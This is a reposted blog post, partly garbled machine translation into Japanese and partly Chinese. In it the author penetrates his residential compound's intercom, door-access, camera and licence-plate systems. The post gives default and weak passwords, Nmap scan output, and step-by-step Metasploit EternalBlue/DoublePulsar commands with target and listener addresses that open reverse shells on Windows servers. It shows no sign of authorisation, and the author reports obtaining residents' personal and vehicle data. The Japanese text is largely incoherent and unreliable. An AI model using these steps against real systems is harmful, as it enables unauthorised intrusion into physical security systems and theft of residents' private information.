私は、セルのセキュリティシステムを取得する方法をステップバイステップで午前[ターン]

序文

子供の頃からのブロガーは、男性は物事をシンプルに保つのが好きですが、現実は常に、このような一定の移動など、不注意にあなたにあまりにも多くの驚きを与えます。

ブロガーは、自分の本当の家に移動したときに、今10日の動きでようやく十分な運動を収集するために、前後に10回移動し、に大学を卒業しました。

最終的に私は最終的にはもはや移動する必要が早い18人のブロガーに住んで移動することを計画し、漏れ、半時間2ベッドルームの家を買うために一口、17年に承認リフォームを拾ったときに15の端部は、低価格の気分を利用しました喜びは、その後、雑用の多様に住んで忙しくし始めたので、これらの月は非常に忙しく、ブログやより少ないですが、内容は内部よりゆっくりと、ノートです。

ブロガーは自分の宣伝インテリジェントシステムのセルの場所にあるを購入したので、私は引退し、右側のブロガーが簡単に、簡単なセキュリティシステムの細胞浸潤を行い、セキュリティシステムの多様性を獲得したしたときに座って、この記事が来ました詳細に説明します。

レディ

始める前に、我々は侵入テストのプロセス全体を通じて心の中で脳を修理できるように、ブロガーは、バーの下、オンラインブロガーの浸透の一例とみなすことが、環境の簡単な説明をする必要があり、ショッピングモールの隣の店のものが用意されてい浸透プロセスのすべての種類は、説明するために11になります。

まあ、ナンセンス、我々はネットワーク侵入テスト・システム上にあるため、このエントリはそれを見つけるためにどこに、自然にエントリを持っている必要があり、言うことではないでしょうか?

我々はすべて知っているように、この内部ネットワークの一般的な領域は、直接、前方ので、比較的安全に行うために、単一の踏み台があり、それが単離に行われた場合でも、外部のネットワークに接続されていないが、通常はネットワークの外側ではありませんされていますこうしたLANシステムの2つの優れた機能を備えています。

最初のポイントは、ネットワーク内のマシン人以上の信頼を維持する限り、それは外部のネットワークに接続されていないとして、基本的にすべての権利、本当にパターンツーソンを破る、後ろに座るとリラックスすることです。

第二の点は、それがウイルスシグネチャは、何千年もの間、更新されないで、あったとしても、何のセキュリティソフトがないことである、家具のように、外部ネットワーク更新ウールは、後で確認することができるマシンはありません。

ネットワーク全体にわたるゲーム基本的には、ちょうど入り口を見つけ、内部LANのこれら二つの特性は非常に壊れやすいです持っているので、入り口が見て非常に良いです。

我々はすべて知っているように、あなたがお互いを見ることができる、あなたがインターホンを表明することができ、このようなものは時々、このような訪問者として、あなたは階下のドアにアクセスすることができますこのようなものを使用してリモートドアを開け、非常に使いやすいです、すべての家庭がインターホンを設置エリアになりました顔財産と警告を、また、ビデオを記録することができ、それだけでなく、またしてもホームの煙警報とともに、火災は直接通知し、あなたはまた、非常に濃縮することができる無料のLANボイスチャット機能に他の居住者を呼び出すことができます。

あなたは、私たちがどのように見えるこの強力なビデオインターホンを見てみましょう、のは、最初からデバイス上のプロセス全体を侵入テストせ、右推測しました

マイクロチャネル画像_20180521153517.jpg  - サイズ:95.61キロバイト - 寸法:900 X 508  - 新しいウィンドウを表示フルチャートを開くためにクリック

デフォルト弱いパスワードでエンジニアリングモードを入力し、IPアドレスを取得し、ゲートウェイサーバも同様に対処します

p80312-171124.jpg  - サイズ:145.86キロバイト - 寸法:824 X 439  - 新しいウィンドウを表示フルチャートを開くためにクリック
p80312-171153.jpg  - サイズ:484.84キロバイト - 寸法:900 X 563  - 新しいウィンドウを表示フルチャートを開くためにクリック

トランシーバーを削除します

p80319-164923.jpg  - サイズ:316.73キロバイト - 寸法:900 X 681  - 新しいウィンドウを表示フルチャートを開くためにクリック

私はルをこすって、このケーブルが短すぎる、ツール

p80319-165232.jpg - 大小: 317.59 KB - 尺寸: 900 x 619 - 点击打开新窗口浏览全图
p80319-171804.jpg - 大小: 608.52 KB - 尺寸:  x  - 点击打开新窗口浏览全图

通信が正しい最終確認され、スイッチ、ルータ、ノートパソコン等の機器接続されたネットワークケーブルを拡張することは容易

p80319-172001.jpg - 大小: 709.62 KB - 尺寸:  x  - 点击打开新窗口浏览全图

侵略を浸透させた後に始めるための基本的な準備作業。

スキャニング

ラインと光猫ネットワークにおける過去の経験によると、今では、ここにIPアドレスが確実に固定されており、世帯数は、試験した場合には、独自のIPアドレスを使用するためにバインドされていると、問題は非常に恥ずかしいです何ではありません場合、多くの所有者はまだショーではない、IPアドレスプールも限りライン上の無紛争など、他のテナントのIPアドレスを使用し、自由をたくさん持っている、機器の上に先に行ってきました:

充電宝、ルータ、ラップトップ

微信图片_20180521155613.jpg - 大小: 552.77 KB - 尺寸:  x  - 点击打开新窗口浏览全图
微信图片_20180521155618.jpg - 大小: 635.75 KB - 尺寸:  x  - 点击打开新窗口浏览全图
微信图片_20180521155623.jpg - 大小: 819.82 KB - 尺寸:  x  - 点击打开新窗口浏览全图

電源は、固定IPルータを提供された後、

screenshot from 2018-05-18 19-06-00.png - 大小: 68.79 KB - 尺寸: 712 x 500 - 点击打开新窗口浏览全图

だから、ラップトップは、ワイヤレス無線LANを介してIPセグメントをスキャンすることができ、およびスキャンソフトウェア怒っているIPスキャナ、彼らとグラフィカルなインターフェイスの私の使用はとてもクール、スピードも速いです

screenshot from 2018-05-18 22-10-17.png - 大小: 297.48 KB - 尺寸:  x  - 点击打开新窗口浏览全图

192.165.0.1/16のIPアドレスの迅速な分類のために、生きているホスト1256を見つけスキャンするには、すべての実行可能な輸出のIPアドレスは、PythonスクリプトIP、HTTPレスポンスヘッダを分類することを書きます

この最後のは、次のカテゴリに分かれています。

最初のカテゴリ

mini_httpd / 1.19 19dec2003

マシンのこのタイプは、一方で、すべてのアクセス制御、家庭用インターホン家庭を備え、BANアクセス制御のロビー、エレベーターガレージアクセス制御、ドアアクセス制御セル、IPアドレスと管理者/ 123456弱いパスワードをリモートで制御することができることです次のようにtelnetがまた接続され、パスワードの変更、ドア制御を開くために、時間、アクセス制御マシンパスワードを含む非常にフルページの機能管理、、、世帯、プロパティのコールセンターを呼び出すなど工場出荷時の設定を復元することができ、機能豊富なインターフェースがあります

2018-05-21 16-15-41 的屏幕截图.png - 大小: 122.37 KB - 尺寸:  x  - 点击打开新窗口浏览全图
屏幕截图 2018-04-16 11.02.12.png - 大小: 88.98 KB - 尺寸:  x  - 点击打开新窗口浏览全图

第二のカテゴリー

DNVRS-Webs
Hikvision-webs/ 
App-webs/    

这三种都是海康威视的监控探头,登录界面有以下几种

2018-05-21 16-26-44 的屏幕截图.png - 大小: 213.71 KB - 尺寸:  x  - 点击打开新窗口浏览全图
2018-05-21 16-33-36 的屏幕截图.png - 大小: 98.26 KB - 尺寸:  x  - 点击打开新窗口浏览全图
2018-05-21 16-48-21 的屏幕截图.png - 大小: 117.88 KB - 尺寸:  x  - 点击打开新窗口浏览全图

只有中间那种可以无限次输错密码进行爆破,其他两种都是输错五次就锁定

第三类

Net Keybord-Webs

这是一个网络键盘,通常用于操作监控的云台转动,比如球机的操作杆,登录界面

2018-05-21 16-32-57 的屏幕截图.png - 大小: 34.85 KB - 尺寸:  x  - 点击打开新窗口浏览全图

密码输错6次就锁定。

第四类

Boa/0.94.13

这个就有意思了,这是车牌识别系统,车辆入库的时候进行车牌识别,拍照存储的机器,也是全部admin admin弱口令直接登录,里面存储了些啥就不多说了,放两张图大家随意感受下

2018-05-21 16-38-26 的屏幕截图.png - 大小: 31.41 KB - 尺寸:  x  - 点击打开新窗口浏览全图
2018-05-21 16-39-06 的屏幕截图.png - 大小: 522.09 KB - 尺寸:  x  - 点击打开新窗口浏览全图
2018-05-21 16-39-29 的屏幕截图.png - 大小: 65.98 KB - 尺寸:  x  - 点击打开新窗口浏览全图

通过对这几种设备的归类扫描,最终确定了几台windows服务器

192.165.15.174
192.165.15.177
192.165.15.190
192.165.15.200
192.165.30.2

使用Nmap扫描结果如下

复制代码
# Nmap 7.70 scan initiated Fri May 18 23:51:30 2018 as: nmap -iL something_ip.txt -oN scaned.txt -T4 --open
Nmap scan report for 192.165.15.174
Host is up (0.063s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
2383/tcp  open  ms-olap4
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown

Nmap scan report for 192.165.15.190
Host is up (0.046s latency).
Not shown: 992 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown

Nmap scan report for 192.165.15.200
Host is up (0.030s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap scan report for 192.165.30.2
Host is up (0.064s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

# Nmap done at Fri May 18 23:51:46 2018 -- 5 IP addresses (4 hosts up) scanned in 16.25 seconds
复制代码

 

很明显,四台机器都开了445端口,其中 192.165.15.174 开了1433端口,明显是sql server数据库,192.165.30.2还开了3389,这台机器是在门禁机里面见过,是门禁系统的服务器。

下面就重点对这几台机器入手,使用msf扫描下看是不是都存在smb漏洞(ms17_010),这漏洞在局域网真的超级好用,扫描截图

screenshot from 2018-05-21 11-20-26.png - 大小: 224.4 KB - 尺寸:  x  - 点击打开新窗口浏览全图

发现只有192.165.15.174 不存在ms17_010,其他三台都存在,操作系统分别是

192.165.15.190 win7 sp1 x86

192.165.15.200 win7 sp1 x64

192.165.30.2 win7 sp1 x86

现在目标就非常明确了,但是有个问题,msf自带的利用模块只针对x64版本的操作系统,对于x86版本的系统只能使用其他工具,emmmmm....

一阵思考之后,博主决定先搞定那台64位win7,为了能够正常的反弹shell回来,我把路由器改成桥接模式,本机电脑设置固定IP,这样我的机器就跟目标机器处于相同网络拓扑,反弹自然无压力

screenshot from 2018-05-19 00-01-27.png - 大小: 31.02 KB - 尺寸: 574 x 519 - 点击打开新窗口浏览全图

so...

msf的用法我这里就不多说了,如果真不知道,可以留言...给出一张run vnc的截图,拿下监控系统

screenshot from 2018-05-19 01-47-41.png - 大小: 1.23 MB - 尺寸:  x  - 点击打开新窗口浏览全图
screenshot from 2018-05-19 01-55-37.png - 大小: 1.12 MB - 尺寸:  x  - 点击打开新窗口浏览全图
screenshot from 2018-05-19 02-30-00.png - 大小: 1.07 MB - 尺寸:  x  - 点击打开新窗口浏览全图

有趣的是这台机器上居然安装了360安全卫士...

注意看上面一张图的那个监控室,管理员面前有三台机器,所以另外两台我下一步就要搞定。

上面说64位win7已经拿下,现在搞定32位机器,使用 https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 这里的Ruby脚本即可,需要注意的是如果本机是kali 64位的需要安装 wine32,安装方法是

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

而且全程操作需要在root下面,安装完wine32后执行一下 wine32 cmd.exe 这样会自动在/root下面创建.wine目录,这个目录msf会用到

使用 

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

将脚本克隆到本地,然后把目录下的deps 目录和rb文件复制到msf的modules路径下,这样既可以使用了(PS:我这里只复制了rb脚本,deps没有复制过去所以命令不太一样),具体命令如下

复制代码
msf > use  exploit/windows/smb/eternalblue_doublepulsar
msf exploit(windows/smb/eternalblue_doublepulsar) > set ETERNALBLUEPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
ETERNALBLUEPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
msf exploit(windows/smb/eternalblue_doublepulsar) > set DOUBLEPULSARPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
DOUBLEPULSARPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
msf exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x86
TARGETARCHITECTURE => x86
msf exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT  wlms.exe
PROCESSINJECT => wlms.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP (all services pack) (x86) (x64)
   1   Windows Server 2003 SP0 (x86)
   2   Windows Server 2003 SP1/SP2 (x86)
   3   Windows Server 2003 (x64)
   4   Windows Vista (x86)
   5   Windows Vista (x64)
   6   Windows Server 2008 (x86) 
   7   Windows Server 2008 R2 (x86) (x64)
   8   Windows 7 (all services pack) (x86) (x64)


msf exploit(windows/smb/eternalblue_doublepulsar) > set target 8
target => 8
msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost
set rhost  
MSF悪用する(Windows / SMB / eternalblue_doublepulsar)>設定rhost 192.165.15.190 
rhost => 192.165.15.190 
MSF利用する(Windows / SMB / eternalblue_doublepulsar)>設定lhost 192.165.7.11 
lhost => 192.165.7.11 
MSF利用する(Windows / SMB / eternalblue_doublepulsar )>エクスプロイト
复制代码

驚くことではないが、その後の攻撃は、攻撃ショットの成功を与え、成功しています。

最初は、アクセスカード管理ソフトウェアの一部だけ、アクセス制御システム、アンチウィルスソフトウェアがインストールされていないです

screenshot from 2018-05-21 12-05-58.png - 大小: 1.02 MB - 尺寸:  x  - 点击打开新窗口浏览全图

使用されるときに、第2のシステムは、車両管理システム、ストレージのうち車両であります

screenshot from 2018-05-21 12-41-30.png - 大小: 743.35 KB - 尺寸:  x  - 点击打开新窗口浏览全图

 

概要

さて、これまでのところ、シンプルな細胞侵入テストのセキュリティシステムのブロガーは、成功した所有者の個人情報、車両情報、車両アクセス登録情報を含むサーバはまた、機密文書を大量に見つかっているクリティカルなシステムを、勝ちましたなども不思議で電話を嫌がらせのすべての種類は、これは毎分を開示するだけではありません。

追伸

セキュリティは全体、堤防の数千マイル危険なもの、次のコピーアクセスカードと同様に、包括的なバーを記述するために一緒に取り締まりの自動制御です。

おすすめ

転載: www.cnblogs.com/nul1/p/11619605.html